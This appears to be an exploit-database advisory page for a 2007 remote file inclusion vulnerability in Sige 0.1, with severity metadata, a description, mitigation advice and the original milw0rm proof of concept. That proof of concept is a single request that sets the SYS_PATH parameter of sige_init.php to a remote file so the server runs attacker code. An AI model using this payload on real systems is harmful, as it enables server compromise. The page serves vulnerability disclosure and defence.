header-logo
Suggest Exploit
vendor:
Sige 0.1
by:
Unknown
7.5
CVSS
HIGH
Remote File Inclusion
CWE
Product Name: Sige 0.1
Affected Version From: Sige 0.1
Affected Version To: Sige 0.1
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Sige 0.1 sige_init.php Remote File Inclusion Vulnerability

This vulnerability allows an attacker to include a remote file by manipulating the SYS_PATH parameter in the sige_init.php file. By providing a malicious URL in the SYS_PATH parameter, an attacker can execute arbitrary code on the server.

Mitigation:

To mitigate this vulnerability, it is recommended to update to a patched version of Sige 0.1 or apply a fix provided by the vendor. Additionally, input validation should be implemented to prevent user-controlled input from being used in file inclusion functions.
Source

Exploit-DB raw data:

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%  Sige 0.1 sige_init.php Remote File Inclusion Vulnerability
%  http://mesh.dl.sourceforge.net/sourceforge/pfadmin/sige_0.1.tgz
%  POC :
%  /inc/sige_init.php?SYS_PATH=http://localhost/scripts/020.txt?
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

# milw0rm.com [2007-10-28]

Navigation

Suggest Exploit

Services By CQR